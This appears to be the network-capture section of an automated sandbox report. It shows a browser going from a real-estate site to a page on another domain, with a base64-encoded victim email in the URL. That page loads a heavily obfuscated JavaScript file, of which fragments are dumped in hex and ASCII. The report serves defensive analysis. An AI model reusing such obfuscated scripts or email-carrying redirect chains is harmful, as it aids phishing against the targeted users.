2024-04-16 12:21:16 UTC	754	IN	Data Raw: 32 62 64 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 78 78 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 68 69 76 61 20 53 61 69 20 48 6f 6d 65 73 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 53 68 69 76 61 20 53 61 69 20 48 6f 6d 65 73 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d Data Ascii: 2bd1<!DOCTYPE html><html lang="zxx"><head><meta charset="UTF-8"><meta name="description" content="Shiva Sai Homes"><meta name="keywords" content="Shiva Sai Homes"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-
2024-04-16 12:21:16 UTC	1369	IN	Data Raw: 2e 2e 2f 61 73 73 65 74 73 2f 63 73 73 2f 65 6c 65 67 61 6e 74 2d 69 63 6f 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2e 2f 2e 2e 2f 61 73 73 65 74 73 2f 63 73 73 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2e 2f 2e 2e 2f 61 73 73 65 74 73 2f 63 73 73 2f 6e 69 63 65 2d 73 65 6c 65 63 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2e 2f 2e 2e 2f 61 73 73 65 74 73 2f 63 Data Ascii: ../assets/css/elegant-icons.css" type="text/css"><link rel="stylesheet" href="../../assets/css/jquery-ui.min.css" type="text/css"><link rel="stylesheet" href="../../assets/css/nice-select.css" type="text/css"><link rel="stylesheet" href="../../assets/c
2024-04-16 12:21:16 UTC	1369	IN	Data Raw: 61 62 62 34 61 31 62 36 62 30 61 64 61 31 62 37 65 61 61 37 61 62 61 39 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 6d 6f 62 69 6c 65 2d 70 68 6f 6e 65 22 3e 3c 2f 69 3e 20 2b 39 31 20 39 31 30 30 20 38 33 35 20 37 33 37 2c 20 2b 39 31 20 37 37 35 39 20 39 37 34 20 35 36 39 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 6d 2d 73 6f 63 69 61 6c 22 3e 0a 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0a 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 Data Ascii: abb4a1b6b0ada1b7eaa7aba9">[email protected]</a></li><li><i class="fa fa-mobile-phone"></i> +91 9100 835 737, +91 7759 974 569</li></ul></div><div class="om-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitt
2024-04-16 12:21:16 UTC	1369	IN	Data Raw: 3e 0a 3c 75 6c 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 3b 22 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 77 61 72 6e 61 62 68 6f 6f 6d 69 22 3e 53 77 61 72 6e 61 20 42 68 6f 6f 6d 69 20 43 69 74 79 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 75 6e 72 69 73 65 22 3e 53 75 6e 72 69 73 65 20 43 69 74 79 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 73 74 72 6f 6e 67 3e 48 79 64 65 72 61 62 61 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 0a 3c 75 6c 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 Data Ascii: ><ul style="position: relative; margin-left: 20px;"><li><a href="/swarnabhoomi">Swarna Bhoomi City</a></li><li><a href="/sunrise">Sunrise City</a></li></ul></li><li><a href="#"><strong>Hyderabad</strong></a><ul style="position: relative; margin-lef
2024-04-16 12:21:16 UTC	1369	IN	Data Raw: 63 6c 65 64 20 73 6d 6f 6f 74 68 2d 73 63 72 6f 6c 6c 2d 74 6f 2d 74 61 72 67 65 74 22 20 68 72 65 66 3d 22 2f 22 3e 52 65 74 75 72 6e 20 48 6f 6d 65 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 63 74 2d 73 65 63 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 36 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 2d 69 74 65 6d Data Ascii: cled smooth-scroll-to-target" href="/">Return Home</a></div></div></div></div></div></section></div><section class="contact-section"><div class="container"><div class="row"><div class="col-lg-6"><div class="contact-info"><div class="ci-item
2024-04-16 12:21:16 UTC	1369	IN	Data Raw: 66 72 61 6d 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 0a 3c 66 6f 6f 74 65 72 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 73 65 63 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 34 20 63 6f 6c 2d 6d 64 2d 36 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 2d 61 62 6f 75 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 2d 77 69 64 67 65 74 22 3e 0a 3c 68 35 3e 53 68 69 76 61 20 53 61 69 20 48 6f 6d 65 73 3c 2f 68 35 3e 0a 3c 2f 64 69 76 3e 0a 3c 70 3e 4f 75 72 20 61 69 6d 20 69 73 20 74 6f 20 62 65 20 79 6f 75 72 20 6c 69 66 65 6c 6f 6e 67 20 72 65 61 6c 20 65 73 74 61 Data Ascii: frame></div></section><footer class="footer-section"><div class="container"><div class="row"><div class="col-lg-4 col-md-6"><div class="fs-about"><div class="fs-widget"><h5>Shiva Sai Homes</h5></div><p>Our aim is to be your lifelong real esta
2024-04-16 12:21:16 UTC	1369	IN	Data Raw: 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 62 74 6e 22 3e 53 75 62 73 63 72 69 62 65 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 2d 74 65 78 74 22 3e 0a 3c 70 3e 0a 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 Data Ascii: button type="submit" class="site-btn">Subscribe</button></form></div></div></div><div class="copyright-text"><p>Copyright ©<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>docu
2024-04-16 12:21:16 UTC	1369	IN	Data Raw: 6e 74 65 72 5f 6d 61 78 20 3d 3d 3d 20 63 6f 75 6e 74 65 72 5f 63 75 72 72 65 6e 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 28 27 23 73 68 6f 77 2d 6e 65 78 74 2d 69 6d 61 67 65 27 29 0d 0a 20 20 20 20 20 20 20 20 20 20 2e 68 69 64 65 28 29 3b 0d 0a 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 63 6f 75 6e 74 65 72 5f 63 75 72 72 65 6e 74 20 3d 3d 3d 20 31 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 28 27 23 73 68 6f 77 2d 70 72 65 76 69 6f 75 73 2d 69 6d 61 67 65 27 29 0d 0a 20 20 20 20 20 20 20 20 20 20 2e 68 69 64 65 28 29 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2f 2a 2a 0d 0a 20 20 20 20 20 2a 0d 0a 20 20 20 20 20 2a 20 40 70 61 72 61 6d 20 73 65 74 49 44 73 20 20 20 20 20 20 20 20 53 65 74 73 20 49 44 73 20 77 Data Ascii: nter_max === counter_current) { $('#show-next-image') .hide(); } else if (counter_current === 1) { $('#show-previous-image') .hide(); } } /** * * @param setIDs Sets IDs w
2024-04-16 12:21:16 UTC	888	IN	Data Raw: 20 20 20 20 20 20 20 2e 61 74 74 72 28 27 64 61 74 61 2d 69 6d 61 67 65 2d 69 64 27 2c 20 63 6f 75 6e 74 65 72 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 24 28 73 65 74 43 6c 69 63 6b 41 74 74 72 29 0d 0a 20 20 20 20 20 20 20 20 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 75 70 64 61 74 65 47 61 6c 6c 65 72 79 28 24 28 74 68 69 73 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 7d 29 3b 0d 0a 0d 0a 2f 2f 20 62 75 69 6c 64 20 6b 65 79 20 61 63 74 69 6f 6e 73 0d 0a 24 28 64 6f 63 75 6d 65 6e 74 29 0d 0a 20 20 2e 6b 65 79 64 6f 77 6e 28 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0d 0a 20 20 20 20 73 Data Ascii: .attr('data-image-id', counter); }); } $(setClickAttr) .on('click', function () { updateGallery($(this)); }); } });// build key actions$(document) .keydown(function (e) { s
2024-04-16 12:21:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	23.220.189.216	443

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:16 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-16 12:21:16 UTC	468	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/079C) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus2-z1 Cache-Control: public, max-age=153752 Date: Tue, 16 Apr 2024 12:21:16 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	35.190.80.1	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:16 UTC	546	OUT	OPTIONS /report/v4?s=FVNDvvcLmx2WJFM1GObnV3A8k24Xo4QcgDeTJP54UVHL42fG0ur4gRuybv6FeMLWjIygd5azM8bmNaVCBAzs7PnLh0rnmGO2evDWk%2FZewBzvhjJ9Fu3iDMqqSKFOlZAuyWMBeGmT8J4%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://sunshivproperties.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:16 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Tue, 16 Apr 2024 12:21:16 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	23.220.189.216	443

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:16 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-16 12:21:17 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 01uvbYwAAAACkqWtaEMjWQL/4cpisZkorTUVNMzBFREdFMDgxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=153752 Date: Tue, 16 Apr 2024 12:21:16 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-16 12:21:17 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	35.190.80.1	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:17 UTC	482	OUT	POST /report/v4?s=FVNDvvcLmx2WJFM1GObnV3A8k24Xo4QcgDeTJP54UVHL42fG0ur4gRuybv6FeMLWjIygd5azM8bmNaVCBAzs7PnLh0rnmGO2evDWk%2FZewBzvhjJ9Fu3iDMqqSKFOlZAuyWMBeGmT8J4%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 506 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:17 UTC	506	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 31 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 73 75 6e 73 68 69 76 70 72 6f 70 65 72 74 69 65 73 2e 63 6f 6d 2f 76 69 65 77 73 2f 70 61 72 74 69 61 6c 73 2f 68 65 61 64 65 72 2e 68 74 6d 6c 3f 77 68 69 74 65 3d 62 57 46 79 61 32 56 30 61 57 35 6e 51 47 4a 35 63 6d 46 74 61 47 56 68 62 48 52 6f 59 32 46 79 5a 53 35 6a 62 32 30 3d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e Data Ascii: [{"age":0,"body":{"elapsed_time":1312,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=","sampling_fraction":1.0,"server_ip":"104.
2024-04-16 12:21:17 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Tue, 16 Apr 2024 12:21:16 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	142.4.12.244	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:19 UTC	748	OUT	GET /wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20= HTTP/1.1 Host: warrentongroup.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://sunshivproperties.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:19 UTC	206	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:21:19 GMT Server: Apache Last-Modified: Thu, 04 Apr 2024 16:36:55 GMT Accept-Ranges: bytes Content-Length: 6405 Connection: close Content-Type: text/html
2024-04-16 12:21:19 UTC	6405	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 77 70 2d 73 65 74 74 69 6e 67 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 3e 0a 20 62 6f 64 79 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 62 61 63 6b 67 72 6f Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title><script src="wp-setting.js"></script><style> body { font-family: Arial, sans-serif; backgro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	142.4.12.244	443	5244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:21:19 UTC	594	OUT	GET /wp-setting.js HTTP/1.1 Host: warrentongroup.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 12:21:19 UTC	221	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:21:19 GMT Server: Apache Last-Modified: Thu, 04 Apr 2024 16:35:51 GMT Accept-Ranges: bytes Content-Length: 147065 Connection: close Content-Type: application/javascript
2024-04-16 12:21:19 UTC	7971	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 65 32 36 38 36 2c 5f 30 78 35 36 31 34 32 39 29 7b 76 61 72 20 5f 30 78 31 63 66 36 36 37 3d 5f 30 78 33 65 32 36 38 36 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 66 66 39 31 39 39 28 5f 30 78 31 63 36 63 34 66 2c 5f 30 78 32 66 64 61 62 33 2c 5f 30 78 36 35 30 63 31 34 2c 5f 30 78 31 63 37 34 62 64 2c 5f 30 78 34 34 39 33 32 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 37 36 31 28 5f 30 78 31 63 37 34 62 64 2d 30 78 31 66 30 2c 5f 30 78 32 66 64 61 62 33 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 30 35 33 63 32 28 5f 30 78 35 62 36 63 32 65 2c 5f 30 78 34 34 34 36 62 39 2c 5f 30 78 31 36 33 63 34 36 2c 5f 30 78 35 36 35 37 64 64 2c 5f 30 78 35 61 65 61 31 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 37 36 31 28 Data Ascii: (function(_0x3e2686,_0x561429){var _0x1cf667=_0x3e2686();function _0xff9199(_0x1c6c4f,_0x2fdab3,_0x650c14,_0x1c74bd,_0x44932b){return _0x4761(_0x1c74bd-0x1f0,_0x2fdab3);}function _0x2053c2(_0x5b6c2e,_0x4446b9,_0x163c46,_0x5657dd,_0x5aea1c){return _0x4761(
2024-04-16 12:21:20 UTC	8000	IN	Data Raw: 44 5b 24 27 29 2c 5f 30 78 65 31 38 66 30 38 28 2d 30 78 32 32 35 2c 2d 30 78 31 34 38 2c 2d 30 78 34 2c 30 78 33 30 33 2c 27 77 24 57 40 27 29 2b 27 63 74 27 2c 5f 30 78 35 30 63 33 63 62 28 30 78 33 35 38 2c 30 78 35 63 62 2c 27 38 4b 59 24 27 2c 30 78 32 63 66 2c 30 78 35 33 64 29 2b 27 69 6e 27 2c 5f 30 78 33 62 30 32 33 66 28 30 78 37 33 61 2c 30 78 34 66 63 2c 30 78 36 35 35 2c 30 78 35 30 64 2c 27 64 47 63 76 27 29 2b 27 6e 74 27 2c 5f 30 78 35 30 63 33 63 62 28 2d 30 78 31 36 62 2c 30 78 35 62 2c 27 6c 71 4d 31 27 2c 30 78 35 30 2c 30 78 31 62 33 29 2b 5f 30 78 33 62 30 32 33 66 28 30 78 36 39 31 2c 30 78 39 30 64 2c 30 78 34 36 33 2c 30 78 38 30 63 2c 27 21 78 28 4a 27 29 2c 5f 30 78 35 37 65 31 66 36 28 2d 30 78 61 66 2c 30 78 31 39 35 2c 27 70 Data Ascii: D[$'),_0xe18f08(-0x225,-0x148,-0x4,0x303,'w$W@')+'ct',_0x50c3cb(0x358,0x5cb,'8KY$',0x2cf,0x53d)+'in',_0x3b023f(0x73a,0x4fc,0x655,0x50d,'dGcv')+'nt',_0x50c3cb(-0x16b,0x5b,'lqM1',0x50,0x1b3)+_0x3b023f(0x691,0x90d,0x463,0x80c,'!x(J'),_0x57e1f6(-0xaf,0x195,'p
2024-04-16 12:21:20 UTC	8000	IN	Data Raw: 61 2c 2d 30 78 31 64 37 2c 30 78 31 33 65 2c 30 78 32 30 34 2c 27 26 4d 68 66 27 29 2c 5f 30 78 35 37 65 31 66 36 28 30 78 32 35 37 2c 30 78 33 35 38 2c 27 42 49 67 6f 27 2c 30 78 33 38 32 2c 30 78 37 34 29 2b 5f 30 78 65 31 38 66 30 38 28 30 78 36 34 36 2c 30 78 34 65 66 2c 30 78 35 32 32 2c 30 78 32 38 66 2c 27 40 76 24 64 27 29 2c 5f 30 78 33 66 34 36 64 66 28 30 78 34 34 33 2c 30 78 33 37 35 2c 27 6c 71 4d 31 27 2c 30 78 31 37 34 2c 30 78 61 64 29 2b 5f 30 78 33 62 30 32 33 66 28 30 78 37 32 34 2c 30 78 34 64 61 2c 30 78 36 30 34 2c 30 78 39 38 37 2c 27 69 32 62 4a 27 29 2c 5f 30 78 35 37 65 31 66 36 28 30 78 35 33 66 2c 30 78 35 38 66 2c 27 4b 43 5b 6d 27 2c 30 78 38 65 61 2c 30 78 33 62 38 29 2b 27 6c 79 27 2c 5f 30 78 35 37 65 31 66 36 28 2d 30 78 Data Ascii: a,-0x1d7,0x13e,0x204,'&Mhf'),_0x57e1f6(0x257,0x358,'BIgo',0x382,0x74)+_0xe18f08(0x646,0x4ef,0x522,0x28f,'@v$d'),_0x3f46df(0x443,0x375,'lqM1',0x174,0xad)+_0x3b023f(0x724,0x4da,0x604,0x987,'i2bJ'),_0x57e1f6(0x53f,0x58f,'KC[m',0x8ea,0x3b8)+'ly',_0x57e1f6(-0x
2024-04-16 12:21:20 UTC	8000	IN	Data Raw: 62 28 30 78 32 38 34 2c 30 78 35 35 35 2c 27 30 2a 69 37 27 2c 30 78 34 30 63 2c 30 78 34 37 66 29 2c 5f 30 78 35 37 65 31 66 36 28 30 78 32 32 31 2c 30 78 35 39 30 2c 27 32 5e 41 61 27 2c 30 78 34 64 61 2c 30 78 35 36 63 29 2b 5f 30 78 35 30 63 33 63 62 28 2d 30 78 36 2c 30 78 34 65 30 2c 27 4b 43 5b 6d 27 2c 30 78 32 32 37 2c 30 78 39 36 29 2c 5f 30 78 35 30 63 33 63 62 28 2d 30 78 32 61 61 2c 30 78 32 64 36 2c 27 21 78 28 4a 27 2c 2d 30 78 31 33 2c 30 78 62 35 29 2b 5f 30 78 35 37 65 31 66 36 28 2d 30 78 33 32 31 2c 2d 30 78 34 63 2c 27 64 75 4d 36 27 2c 2d 30 78 32 33 61 2c 30 78 32 38 29 2c 5f 30 78 35 30 63 33 63 62 28 30 78 33 39 38 2c 30 78 35 37 65 2c 27 76 36 58 4e 27 2c 30 78 32 62 31 2c 30 78 31 64 31 29 2b 5f 30 78 33 62 30 32 33 66 28 30 78 Data Ascii: 